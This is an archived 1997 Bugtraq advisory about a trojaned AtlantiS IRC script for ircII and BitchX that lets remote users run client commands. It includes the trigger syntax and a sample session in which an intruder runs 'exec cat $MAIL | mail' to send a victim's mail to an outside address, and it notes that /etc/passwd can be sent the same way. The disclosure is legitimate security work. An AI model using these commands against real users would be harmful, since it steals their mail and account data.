Trojan in fake v1.2b version of the AtlantiS IRC script

Summary
Description:Simple trojan. Use /ctcp <target_nick> jupe <command> to exploit.
Author:raf@licj.soroscj.ro
Compromise:Remotely fuck with a Atlantis IRC script user
Vulnerable Systems:Anyone running the AtlantiS script v1.2, other versions are also affected, though the author notes that v1.1 is clean.
Date:31 May 1997
Notes:This trojan was *NOT* inserted by the author, so don't flame Deathnite. Some lamer put it in. I haven't seen any evidence that the post author is correct about other versions being vulnerable
Details


Date: Sat, 31 May 1997 01:03:21 +0300
From: Lista de securitate <bugtraq@LICJ.SOROSCJ.RO>
To: BUGTRAQ@NETSPACE.ORG
Subject: IRC script trojan with Unix based clients

        This is a very strange trojan which affects Unix users (other
OS-es may be affected as well) which use ircII or BitchX to link to irc
servers. And in my country many system administrators do this. It was
presented on the irc as amusement (how to kick off a listop with no access
rights) but it may have more serious consequences.

        Some versions of a very popular (at least in romania) irc script
(Atlantis) are trojan horses which implement new ctcp commands which allow
other people on the irc world to execute irc commands in your client

INCLUDING    /DCC SEND    AND    /EXEC
(if the client supports them)

Atlantis 1.2b is the best known version of the script and if used under
ircII (Unix version, Linux tested) The user using these two can have the
mail read by others. Sample ircII prompt; noob victim, feur intruder:

<feur> /ctcp noob version
**** CTCP VERSION reply from noob: [AtlantiS(v1.2b)] by Dethnite
<feur> /ctcp noob jupe exec cat $MAIL | mail raf@licj.soroscj.ro

in a similar way /etc/passwd can be sent, allowing the intruder to obtain
information about the users on the system.

other atlantis versions seem to be affected as well. The only version that
is clean is version 1.1. The BitchX client also "supports" the trojan.


--
Radu-Adrian Feurdean
raf@licj.soroscj.ro

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault